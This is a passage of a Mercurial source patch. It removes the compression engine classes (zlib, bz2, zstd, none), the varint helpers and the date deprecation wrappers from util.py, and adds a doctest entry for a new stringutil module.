NotImplementedError() - - def decompressorreader(self, fh): - """Perform decompression on a file object. - - Argument is an object with a ``read(size)`` method that returns - compressed data. Return value is an object with a ``read(size)`` that - returns uncompressed data. - """ - raise NotImplementedError() - - def revlogcompressor(self, opts=None): - """Obtain an object that can be used to compress revlog entries. - - The object has a ``compress(data)`` method that compresses binary - data. This method returns compressed binary data or ``None`` if - the data could not be compressed (too small, not compressible, etc). - The returned data should have a header uniquely identifying this - compression format so decompression can be routed to this engine. - This header should be identified by the ``revlogheader()`` return - value. - - The object has a ``decompress(data)`` method that decompresses - data. The method will only be called if ``data`` begins with - ``revlogheader()``. The method should return the raw, uncompressed - data or raise a ``RevlogError``. - - The object is reusable but is not thread safe. - """ - raise NotImplementedError() - -class _zlibengine(compressionengine): - def name(self): - return 'zlib' - - def bundletype(self): - """zlib compression using the DEFLATE algorithm. - - All Mercurial clients should support this format. The compression - algorithm strikes a reasonable balance between compression ratio - and size. - """ - return 'gzip', 'GZ' - - def wireprotosupport(self): - return compewireprotosupport('zlib', 20, 20) - - def revlogheader(self): - return 'x' - - def compressstream(self, it, opts=None): - opts = opts or {} - - z = zlib.compressobj(opts.get('level', -1)) - for chunk in it: - data = z.compress(chunk) - # Not all calls to compress emit data. It is cheaper to inspect - # here than to feed empty chunks through generator. - if data: - yield data - - yield z.flush() - - def decompressorreader(self, fh): - def gen(): - d = zlib.decompressobj() - for chunk in filechunkiter(fh): - while chunk: - # Limit output size to limit memory. - yield d.decompress(chunk, 2 ** 18) - chunk = d.unconsumed_tail - - return chunkbuffer(gen()) - - class zlibrevlogcompressor(object): - def compress(self, data): - insize = len(data) - # Caller handles empty input case. - assert insize > 0 - - if insize < 44: - return None - - elif insize <= 1000000: - compressed = zlib.compress(data) - if len(compressed) < insize: - return compressed - return None - - # zlib makes an internal copy of the input buffer, doubling - # memory usage for large inputs. So do streaming compression - # on large inputs. - else: - z = zlib.compressobj() - parts = [] - pos = 0 - while pos < insize: - pos2 = pos + 2**20 - parts.append(z.compress(data[pos:pos2])) - pos = pos2 - parts.append(z.flush()) - - if sum(map(len, parts)) < insize: - return ''.join(parts) - return None - - def decompress(self, data): - try: - return zlib.decompress(data) - except zlib.error as e: - raise error.RevlogError(_('revlog decompress error: %s') % - forcebytestr(e)) - - def revlogcompressor(self, opts=None): - return self.zlibrevlogcompressor() - -compengines.register(_zlibengine()) - -class _bz2engine(compressionengine): - def name(self): - return 'bz2' - - def bundletype(self): - """An algorithm that produces smaller bundles than ``gzip``. - - All Mercurial clients should support this format. - - This engine will likely produce smaller bundles than ``gzip`` but - will be significantly slower, both during compression and - decompression. - - If available, the ``zstd`` engine can yield similar or better - compression at much higher speeds. - """ - return 'bzip2', 'BZ' - - # We declare a protocol name but don't advertise by default because - # it is slow. - def wireprotosupport(self): - return compewireprotosupport('bzip2', 0, 0) - - def compressstream(self, it, opts=None): - opts = opts or {} - z = bz2.BZ2Compressor(opts.get('level', 9)) - for chunk in it: - data = z.compress(chunk) - if data: - yield data - - yield z.flush() - - def decompressorreader(self, fh): - def gen(): - d = bz2.BZ2Decompressor() - for chunk in filechunkiter(fh): - yield d.decompress(chunk) - - return chunkbuffer(gen()) - -compengines.register(_bz2engine()) - -class _truncatedbz2engine(compressionengine): - def name(self): - return 'bz2truncated' - - def bundletype(self): - return None, '_truncatedBZ' - - # We don't implement compressstream because it is hackily handled elsewhere. - - def decompressorreader(self, fh): - def gen(): - # The input stream doesn't have the 'BZ' header. So add it back. - d = bz2.BZ2Decompressor() - d.decompress('BZ') - for chunk in filechunkiter(fh): - yield d.decompress(chunk) - - return chunkbuffer(gen()) - -compengines.register(_truncatedbz2engine()) - -class _noopengine(compressionengine): - def name(self): - return 'none' - - def bundletype(self): - """No compression is performed. - - Use this compression engine to explicitly disable compression. - """ - return 'none', 'UN' - - # Clients always support uncompressed payloads. Servers don't because - # unless you are on a fast network, uncompressed payloads can easily - # saturate your network pipe. - def wireprotosupport(self): - return compewireprotosupport('none', 0, 10) - - # We don't implement revlogheader because it is handled specially - # in the revlog class. - - def compressstream(self, it, opts=None): - return it - - def decompressorreader(self, fh): - return fh - - class nooprevlogcompressor(object): - def compress(self, data): - return None - - def revlogcompressor(self, opts=None): - return self.nooprevlogcompressor() - -compengines.register(_noopengine()) - -class _zstdengine(compressionengine): - def name(self): - return 'zstd' - - @propertycache - def _module(self): - # Not all installs have the zstd module available. So defer importing - # until first access. - try: - from . import zstd - # Force delayed import. - zstd.__version__ - return zstd - except ImportError: - return None - - def available(self): - return bool(self._module) - - def bundletype(self): - """A modern compression algorithm that is fast and highly flexible. - - Only supported by Mercurial 4.1 and newer clients. - - With the default settings, zstd compression is both faster and yields - better compression than ``gzip``. It also frequently yields better - compression than ``bzip2`` while operating at much higher speeds. - - If this engine is available and backwards compatibility is not a - concern, it is likely the best available engine. - """ - return 'zstd', 'ZS' - - def wireprotosupport(self): - return compewireprotosupport('zstd', 50, 50) - - def revlogheader(self): - return '\x28' - - def compressstream(self, it, opts=None): - opts = opts or {} - # zstd level 3 is almost always significantly faster than zlib - # while providing no worse compression. It strikes a good balance - # between speed and compression. - level = opts.get('level', 3) - - zstd = self._module - z = zstd.ZstdCompressor(level=level).compressobj() - for chunk in it: - data = z.compress(chunk) - if data: - yield data - - yield z.flush() - - def decompressorreader(self, fh): - zstd = self._module - dctx = zstd.ZstdDecompressor() - return chunkbuffer(dctx.read_from(fh)) - - class zstdrevlogcompressor(object): - def __init__(self, zstd, level=3): - # Writing the content size adds a few bytes to the output. However, - # it allows decompression to be more optimal since we can - # pre-allocate a buffer to hold the result. - self._cctx = zstd.ZstdCompressor(level=level, - write_content_size=True) - self._dctx = zstd.ZstdDecompressor() - self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE - self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE - - def compress(self, data): - insize = len(data) - # Caller handles empty input case. - assert insize > 0 - - if insize < 50: - return None - - elif insize <= 1000000: - compressed = self._cctx.compress(data) - if len(compressed) < insize: - return compressed - return None - else: - z = self._cctx.compressobj() - chunks = [] - pos = 0 - while pos < insize: - pos2 = pos + self._compinsize - chunk = z.compress(data[pos:pos2]) - if chunk: - chunks.append(chunk) - pos = pos2 - chunks.append(z.flush()) - - if sum(map(len, chunks)) < insize: - return ''.join(chunks) - return None - - def decompress(self, data): - insize = len(data) - - try: - # This was measured to be faster than other streaming - # decompressors. - dobj = self._dctx.decompressobj() - chunks = [] - pos = 0 - while pos < insize: - pos2 = pos + self._decompinsize - chunk = dobj.decompress(data[pos:pos2]) - if chunk: - chunks.append(chunk) - pos = pos2 - # Frame should be exhausted, so no finish() API. - - return ''.join(chunks) - except Exception as e: - raise error.RevlogError(_('revlog decompress error: %s') % - forcebytestr(e)) - - def revlogcompressor(self, opts=None): - opts = opts or {} - return self.zstdrevlogcompressor(self._module, - level=opts.get('level', 3)) - -compengines.register(_zstdengine()) - -def bundlecompressiontopics(): - """Obtains a list of available bundle compressions for use in help.""" - # help.makeitemsdocs() expects a dict of names to items with a .__doc__. - items = {} - - # We need to format the docstring. So use a dummy object/type to hold it - # rather than mutating the original. - class docobject(object): - pass - - for name in compengines: - engine = compengines[name] - - if not engine.available(): - continue - - bt = engine.bundletype() - if not bt or not bt[0]: - continue - - doc = pycompat.sysstr('``%s``\n %s') % ( - bt[0], engine.bundletype.__doc__) - - value = docobject() - value.__doc__ = doc - value._origdoc = engine.bundletype.__doc__ - value._origfunc = engine.bundletype - - items[bt[0]] = value - - return items - -i18nfunctions = bundlecompressiontopics().values() - -# convenient shortcut -dst = debugstacktrace - -def safename(f, tag, ctx, others=None): - """ - Generate a name that it is safe to rename f to in the given context. - - f: filename to rename - tag: a string tag that will be included in the new name - ctx: a context, in which the new name must not exist - others: a set of other filenames that the new name must not be in - - Returns a file name of the form oldname~tag[~number] which does not exist - in the provided context and is not in the set of other names. - """ - if others is None: - others = set() - - fn = '%s~%s' % (f, tag) - if fn not in ctx and fn not in others: - return fn - for n in itertools.count(1): - fn = '%s~%s~%s' % (f, tag, n) - if fn not in ctx and fn not in others: - return fn - -def readexactly(stream, n): - '''read n bytes from stream.read and abort if less was available''' - s = stream.read(n) - if len(s) < n: - raise error.Abort(_("stream ended unexpectedly" - " (got %d bytes, expected %d)") - % (len(s), n)) - return s - -def uvarintencode(value): - """Encode an unsigned integer value to a varint. - - A varint is a variable length integer of 1 or more bytes. Each byte - except the last has the most significant bit set. The lower 7 bits of - each byte store the 2's complement representation, least significant group - first. - - >>> uvarintencode(0) - '\\x00' - >>> uvarintencode(1) - '\\x01' - >>> uvarintencode(127) - '\\x7f' - >>> uvarintencode(1337) - '\\xb9\\n' - >>> uvarintencode(65536) - '\\x80\\x80\\x04' - >>> uvarintencode(-1) - Traceback (most recent call last): - ... - ProgrammingError: negative value for uvarint: -1 - """ - if value < 0: - raise error.ProgrammingError('negative value for uvarint: %d' - % value) - bits = value & 0x7f - value >>= 7 - bytes = [] - while value: - bytes.append(pycompat.bytechr(0x80 | bits)) - bits = value & 0x7f - value >>= 7 - bytes.append(pycompat.bytechr(bits)) - - return ''.join(bytes) - -def uvarintdecodestream(fh): - """Decode an unsigned variable length integer from a stream. - - The passed argument is anything that has a ``.read(N)`` method. - - >>> try: - ... from StringIO import StringIO as BytesIO - ... except ImportError: - ... from io import BytesIO - >>> uvarintdecodestream(BytesIO(b'\\x00')) - 0 - >>> uvarintdecodestream(BytesIO(b'\\x01')) - 1 - >>> uvarintdecodestream(BytesIO(b'\\x7f')) - 127 - >>> uvarintdecodestream(BytesIO(b'\\xb9\\n')) - 1337 - >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04')) - 65536 - >>> uvarintdecodestream(BytesIO(b'\\x80')) - Traceback (most recent call last): - ... - Abort: stream ended unexpectedly (got 0 bytes, expected 1) - """ - result = 0 - shift = 0 - while True: - byte = ord(readexactly(fh, 1)) - result |= ((byte & 0x7f) << shift) - if not (byte & 0x80): - return result - shift += 7 - -### -# Deprecation warnings for util.py splitting -### - -def _deprecatedfunc(func, version): - def wrapped(*args, **kwargs): - fn = pycompat.sysbytes(func.__name__) - mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):] - msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn) - nouideprecwarn(msg, version) - return func(*args, **kwargs) - wrapped.__name__ = func.__name__ - return wrapped - -defaultdateformats = dateutil.defaultdateformats -extendeddateformats = dateutil.extendeddateformats -makedate = _deprecatedfunc(dateutil.makedate, '4.6') -datestr = _deprecatedfunc(dateutil.datestr, '4.6') -shortdate = _deprecatedfunc(dateutil.shortdate, '4.6') -parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6') -strdate = _deprecatedfunc(dateutil.strdate, '4.6') -parsedate = _deprecatedfunc(dateutil.parsedate, '4.6') -matchdate = _deprecatedfunc(dateutil.matchdate, '4.6') diff --git a/tests/test-doctest.py b/tests/test-doctest.py --- a/tests/test-doctest.py +++ b/tests/test-doctest.py @@ -70,6 +70,7 @@ testmod('mercurial.ui') testmod('mercurial.url') testmod('mercurial.util') testmod('mercurial.util', testtarget='platform') +testmod('mercurial.utils.stringutil') testmod('hgext.convert.convcmd') testmod('hgext.convert.cvsps') testmod('hgext.convert.filemap')